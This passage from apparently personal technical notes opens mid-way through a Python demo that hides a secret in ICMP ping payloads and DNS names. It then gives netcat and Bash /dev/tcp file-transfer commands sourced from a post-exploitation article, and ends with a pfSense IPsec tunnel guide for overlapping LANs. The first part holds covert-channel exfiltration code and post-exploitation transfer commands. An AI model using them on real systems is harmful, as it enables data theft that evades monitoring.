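    wire = [icmp_payload(p) for p in icmp_patterns(secret)]
    print("ICMP:", decode_icmp(wire))
    print("DNS :", decode_dns(dns_names(secret) + ["www.example.com."]))
    print("odd tail:", decode_icmp([icmp_payload("4142")]))  # shows the 4-byte-alignment problem
```

The last line illustrates the caveat: a final chunk of 2 bytes ("AB") is repeated by ping to fill the payload, so the receiver's load[-4:] yields "ABAB", not "AB". Pad the file to a multiple of 4 bytes, or transmit its length first, if exact reconstruction matters.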

File transfer using netcat:

Receiver:

nc -l -p 1337 > 1.txt

Sender:

nc 10.10.10.200 1337 < 1.txt

Alternatively the sender can be the listening side:

cat 1.txt | nc -l -p 1337

and, when nc is not available on the receiving host, Bash /dev/tcp can pull the file from that listener:

cat < /dev/tcp/10.10.10.200/1337 > 1.txt

Source: https://www.hackplayers.com/2019/09/transferir-archivos-post-explotacion.html?m=1

IPsec tunnel using virtual IPs

IPsec tunnel using virtual IPs (both LANs on the same subnet) in pfSense

If you need to bring up an IPsec tunnel and the LAN range is the same on both sides, proceed as follows:

Environment:

Office1
LAN: 192.168.0.0/24
Virtual LAN inside the IPsec tunnel: 100.100.100.0/24

Office2
LAN: 192.168.0.0/24
Virtual LAN inside the IPsec tunnel: 200.200.200.0/24

(These two ranges are the ones from the original notes; 100.100.100.0/24 lies inside the RFC 6598 shared address space and 200.200.200.0/24 is publicly routable, so in a real deployment pick two unused RFC 1918 networks instead.)

Required configuration on the Office1 pfSense:

Create a Virtual IP (Firewall -> Virtual IPs) of type IP Alias on the LAN interface with the address 100.100.100.1/24; 100.100.100.0/24 becomes Office1's "virtual" LAN as seen from the other side, and 100.100.100.1 is the address used for NAT below.

Create an interface for the tunnel (Interfaces -> Assignments), then open it (Interfaces -> OPTx, or whatever the new interface is named), rename it as desired and enable it.

Add the route: System -> Routing, 200.200.200.0/24 via the interface you just created.

Create the outbound NAT rule (Firewall -> NAT -> Outbound), switch the mode to Manual and save. Interface: the tunnel interface created above (traffic to 200.200.200.0/24 is routed through it, not out the WAN, so a rule on the WAN interface would never match); Source: 192.168.0.0/24; Destination: Network 200.200.200.0/24; Translation address: 100.100.100.1. This is a many-to-one translation: Office2 sees every Office1 host as 100.100.100.1.

Set Phase 2 of the tunnel to Routed (VTI).

Repeat these steps on Office2 with the networks swapped (Virtual IP 200.200.200.1/24, route to 100.100.100.0/24, translation address 200.200.200.1).

Done; hosts on each side reach the other office through its virtual range (Office1 addresses Office2 as 200.200.200.x and vice versa).